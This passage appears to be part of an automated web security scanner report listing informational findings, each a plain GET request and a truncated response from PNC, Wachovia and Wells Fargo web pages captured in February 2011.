Date: Wed, 02 Feb 2011 22:20:14 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvUHJvZHVjdHNBbmRTZXJ2aWNlLmRv
Keep-Alive: timeout=60, max=263
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.109. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Request

GET /webapp/unsec/Blank.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:04 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.110. https://www.pnc.com/webapp/unsec/Gateway.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Gateway.do

Request

GET /webapp/unsec/Gateway.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:03 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9HYXRld2F5LmRv
Keep-Alive: timeout=60, max=183
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.111. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Request

GET /webapp/unsec/Homepage.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:03 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Keep-Alive: timeout=60, max=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.112. https://www.pnc.com/webapp/unsec/NCProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/NCProductsAndService.do

Request

GET /webapp/unsec/NCProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9OQ1Byb2R1Y3RzQW5kU2VydmljZS5kbw..
Keep-Alive: timeout=60, max=198
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.113. https://www.pnc.com/webapp/unsec/ProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/ProductsAndService.do

Request

GET /webapp/unsec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:06 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Qcm9kdWN0c0FuZFNlcnZpY2UuZG8.
Keep-Alive: timeout=60, max=59
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.114. https://www.pnc.com/webapp/unsec/Solutions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Solutions.do

Request

GET /webapp/unsec/Solutions.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Tb2x1dGlvbnMuZG8.
Keep-Alive: timeout=60, max=298
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

23.115. https://www.pnc.com/webapp/unsec/depositRates/init.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/depositRates/init.app

Request

GET /webapp/unsec/depositRates/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:10 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9kZXBvc2l0UmF0ZXMvaW5pdC5hcHA.
Keep-Alive: timeout=60, max=291
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Interest Rate Center</title>
<meta http-e
...[SNIP]...

23.116. https://www.pnc.com/webapp/unsec/homeEquity/init.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/homeEquity/init.app

Request

GET /webapp/unsec/homeEquity/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:10 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9ob21lRXF1aXR5L2luaXQuYXBw
Keep-Alive: timeout=60, max=287
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 39863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - PNC Home Equity Loan Rates Search</title>
...[SNIP]...

23.117. https://www.pncsites.com/IRA/home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncsites.com
Path:   /IRA/home.html

Request

GET /IRA/home.html HTTP/1.1
Host: www.pncsites.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:22 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 19:21:30 GMT
ETag: "4280c7-ae2-49b518e5da280"
Accept-Ranges: bytes
Content-Length: 2786
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>PNC B
...[SNIP]...

23.118. https://www.pncsites.com/points/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncsites.com
Path:   /points/index.html

Request

GET /points/index.html HTTP/1.1
Host: www.pncsites.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:23 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 19:21:30 GMT
ETag: "409031-27cc-49b518e5da280"
Accept-Ranges: bytes
Content-Length: 10188
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <title>Ba
...[SNIP]...

23.119. https://www.pncvirtualwallet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncvirtualwallet.com
Path:   /

Request

GET / HTTP/1.1
Host: www.pncvirtualwallet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:23 GMT
Server: Apache
Last-Modified: Wed, 29 Dec 2010 17:03:46 GMT
ETag: "3740c8-443f-8d58e080"
Accept-Ranges: bytes
Content-Length: 17471
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Banking &a
...[SNIP]...

23.120. https://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:49 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 20 Jan 2011 00:00:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7158
Expires: Thu, 03 Feb 2011 00:00:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=187
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 26584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

23.121. https://www.wachovia.com/common_files/metrics/tc/tc_targeting.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /common_files/metrics/tc/tc_targeting.html

Request

GET /common_files/metrics/tc/tc_targeting.html HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C; originalReferrer=

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 18 Nov 2008 19:53:15 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-68436457
Expires: Tue, 02 Dec 2008 19:53:15 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=178
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 1137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="robots
...[SNIP]...

23.122. https://www.wachovia.com/files/Hands_on_Banking.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /files/Hands_on_Banking.pdf

Request

GET /files/Hands_on_Banking.pdf HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:53 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 12 Aug 2010 23:10:09 GMT
Accept-Ranges: bytes
Content-Length: 124996
Cache-Control: max-age=-13821524
Expires: Thu, 26 Aug 2010 23:10:09 GMT
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=184
Connection: Keep-Alive
Content-Type: application/pdf

%PDF-1.7%....
5 0 obj<</Linearized 1/L 124996/O 7/E 120207/N 1/T 124855/H [ 1516 267]>>endobj xref5 610000000016 00000 n
0000001783 00000 n
0000001860 00000 n
0000002277 000
...[SNIP]...

23.123. https://www.wellsfargo.com/about/diversity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/diversity/

Request

GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>About Wells Fargo - Diversity
...[SNIP]...

23.124. https://www.wellsfargo.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/

Request

GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Auto Loans ... Wells F
...[SNIP]...

23.125. https://www.wellsfargo.com/browser/jaws_setting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /browser/jaws_setting

Request

GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.126. https://www.wellsfargo.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

23.127. https://www.wellsfargo.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /checking/

Request

GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Checking Account - Compa
...[SNIP]...

23.128. https://www.wellsfargo.com/credit_cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/

Request

GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Credit Cards
...[SNIP]...

23.129. https://www.wellsfargo.com/equity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/

Request

GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2TyTNJhY3JchnGmJ4bFhFZNhrNjKnLLw809GTQGsf17zgJWCnCyt!-530822505; domain=.wellsfargo.com; path=/; secure
Set-Cookie: msc=5572; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:44 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=2129943306.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Home Equity Loans & Li
...[SNIP]...

23.130. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Request

GET /help/ HTTP/1.1
